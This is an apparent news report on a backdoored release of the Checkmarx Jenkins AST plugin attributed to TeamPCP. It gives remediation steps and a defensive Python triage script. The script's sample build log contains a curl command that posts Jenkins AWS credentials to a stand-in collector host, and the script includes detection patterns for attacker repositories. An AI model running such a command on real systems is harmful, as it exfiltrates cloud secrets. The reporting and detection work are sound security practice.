Checkmarx Jenkins plugin compromised in new supply chain attack
Briefly

"A tampered version of the Checkmarx Jenkins AST plugin has appeared in the Jenkins Marketplace. The attack has been assigned a CVE identifier (CVE-2026-33634) with a CVSS score of 9.4. Checkmarx has confirmed the incident and advises users to take immediate action. The hacker group TeamPCP renamed the Checkmarx Jenkins AST plugin's GitHub repository to 'Checkmarx-Fully-Hacked-by-TeamPCP-and-Their-Customers-Should-Cancel-Now.' The repository description was changed to: 'Checkmarx fails to rotate secrets again. with love - TeamPCP.' The group then backdoored the plugin release itself."
"Jenkins instances that installed version 2026.5.09 are therefore running a compromised plugin. The malware has a Dune theme. Repositories on the compromised cx-plugins-releases account have names like kralizec-navigator-709 and mentat-navigator-124, all with the description 'A Mini Shai-Hulud has Appeared.' This is not the first time TeamPCP has targeted Checkmarx. In March 2026, the group had already compromised checkmarx/ast-github-action and checkmarx/kics-github-action."
"Checkmarx recommends using only version 2.0.13-829.vc72453fa_1c16, published on December 17, 2025. Anyone who has installed version 2026.5.09 must rotate all secrets that were visible to the Jenkins runner: GitHub tokens, cloud credentials (AWS/GCP/Azure), Kubernetes configurations, Docker credentials, and SSH keys. In addition, SOCRadar recommends checking Jenkins build logs for outbound traffic to unknown domains and searching for Dune-related repository names in GitHub organizations."
"During that same campaign, more than 66 npm packages were compromised, and at least 1,000 enterprise SaaS environments were potentially exposed. Trivy and LiteLLM were also targeted. Previous findings revealed how these supply chain attacks target developer endpoints, with attackers specifically hunting for cloud credentials, npm publication tokens, and SSH keys."
A tampered build of the Checkmarx Jenkins AST plugin was published in the Jenkins Marketplace; the incident is tracked as CVE-2026-33634 with a CVSS score of 9.4. The attacker group, TeamPCP, renamed the plugin's GitHub repository, replaced its description with a taunt about unrotated secrets, and then backdoored the plugin release itself. Any Jenkins instance that installed version 2026.5.09 is running the compromised plugin. The campaign uses a Dune theme: repositories on the compromised cx-plugins-releases account carry names such as kralizec-navigator-709 and mentat-navigator-124, all described as "A Mini Shai-Hulud has Appeared". TeamPCP had already compromised checkmarx/ast-github-action and checkmarx/kics-github-action in March 2026. Checkmarx recommends using only version 2.0.13-829.vc72453fa_1c16, published on December 17, 2025. Anyone who installed 2026.5.09 should treat every secret the Jenkins runner could read as exposed and rotate it (GitHub tokens, AWS/GCP/Azure credentials, Kubernetes configurations, Docker credentials and SSH keys), review build logs for outbound traffic to unknown domains, and search their GitHub organizations for Dune-themed repository names.
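The three triage steps above (confirm which plugin version is installed, look for unexpected outbound traffic in build logs, and look for Dune-themed repositories in your GitHub organization) as a small Python helper. This is an added example, not tooling from Checkmarx, SOCRadar, Techzine or the Jenkins project. Assumptions, labelled in the code: the plugin's Jenkins short name (`checkmarx-ast-scanner`), an inventory format of `<short-name> (<long-name>) <version>` as printed by `jenkins-cli list-plugins`, an allowlist of domains a Checkmarx build legitimately contacts, and a repository-name pattern that generalises the two names reported in the incident. The sample inventory, log lines and repository list are constructed, not real data.

```python
"""Triage helper for the tampered Checkmarx Jenkins AST plugin release.

Added example; not tooling from Checkmarx, SOCRadar or the Jenkins project.
Assumed inputs: plugin inventory lines `<short-name> (<long-name>) <version>`
as printed by `jenkins-cli list-plugins`, plain-text build console logs, and
GitHub repositories as (name, description) pairs from an org listing.
"""
import re
from urllib.parse import urlsplit

# Version strings from the advisory: the only release Checkmarx says to use,
# and the release known to be backdoored.
SAFE_VERSION = "2.0.13-829.vc72453fa_1c16"
BAD_VERSION = "2026.5.09"
# Assumption: the plugin's Jenkins short name; the long-name match below is a
# fallback in case it differs on your instance.
PLUGIN_SHORT_NAME = "checkmarx-ast-scanner"

PLUGIN_LINE = re.compile(r"^(?P<short>\S+)\s+\((?P<long>.*)\)\s+(?P<ver>\S+)$")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
# Assumption: generalises the two repository names seen in the incident
# (kralizec-navigator-709, mentat-navigator-124) and their shared description.
DUNE_REPO_NAME = re.compile(r"^[a-z]+-navigator-\d+$")
DUNE_DESCRIPTION = re.compile(r"shai-hulud", re.IGNORECASE)


def check_plugin_inventory(inventory: str) -> list[tuple[str, str, str]]:
    """(short_name, version, verdict) for each Checkmarx AST plugin entry.

    'known-bad' is the backdoored release, 'ok' the advised one and
    'unverified' anything else, which should be treated as suspect until
    checked against the Checkmarx advisory.
    """
    findings = []
    for line in inventory.splitlines():
        m = PLUGIN_LINE.match(line.strip())
        if not m:
            continue
        short, long_name, ver = m.group("short", "long", "ver")
        if short != PLUGIN_SHORT_NAME and "checkmarx ast" not in long_name.lower():
            continue
        verdict = {BAD_VERSION: "known-bad", SAFE_VERSION: "ok"}.get(ver, "unverified")
        findings.append((short, ver, verdict))
    return findings


def unknown_outbound_hosts(console_log: str, allowed_suffixes: tuple[str, ...]) -> set[str]:
    """Hosts named in URLs in a build log that fall outside the allowed domains."""
    unknown = set()
    for url in URL_RE.findall(console_log):
        host = (urlsplit(url).hostname or "").lower()
        if host and not any(host == s or host.endswith("." + s) for s in allowed_suffixes):
            unknown.add(host)
    return unknown


def dune_themed_repos(repos: list[tuple[str, str]]) -> list[str]:
    """Repository names whose name or description match the observed theme."""
    return [name for name, desc in repos
            if DUNE_REPO_NAME.match(name) or DUNE_DESCRIPTION.search(desc or "")]


# Constructed sample data; not real inventories, logs or repositories.
SAMPLE_INVENTORY = """\
git (Git plugin) 5.2.2
checkmarx-ast-scanner (Checkmarx AST Scanner) 2026.5.09
"""
SAMPLE_LOG = """\
[Checkmarx] Downloading CLI from https://github.com/Checkmarx/ast-cli/releases/download/x
[Checkmarx] Uploading results to https://ast.checkmarx.net/api/scans
sh: curl -s https://collector.example/collect -d @/var/lib/jenkins/.aws/credentials
"""
SAMPLE_REPOS = [
    ("kralizec-navigator-709", "A Mini Shai-Hulud has Appeared"),
    ("ast-cli", "Checkmarx AST CLI"),
    ("sandworm-navigator-3", ""),
]
# Assumption: domains a Checkmarx AST build legitimately talks to on this instance.
ALLOWED = ("github.com", "checkmarx.net", "jenkins.io")

if __name__ == "__main__":
    for short, ver, verdict in check_plugin_inventory(SAMPLE_INVENTORY):
        print(f"plugin {short} {ver}: {verdict}")
    for host in sorted(unknown_outbound_hosts(SAMPLE_LOG, ALLOWED)):
        print(f"unexpected outbound host in build log: {host}")
    for name in dune_themed_repos(SAMPLE_REPOS):
        print(f"Dune-themed repository: {name}")
```

A plugin version that is neither the backdoored build nor the advised build is reported as `unverified` rather than silently passed, since the advisory names only one release as safe. The log check is a coarse first pass over console output; it will not see connections the malware makes without writing a URL to the log, so treat it as a quick indicator, not as proof of absence, and rotate the listed secrets regardless if 2026.5.09 was installed.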
Read at Techzine Global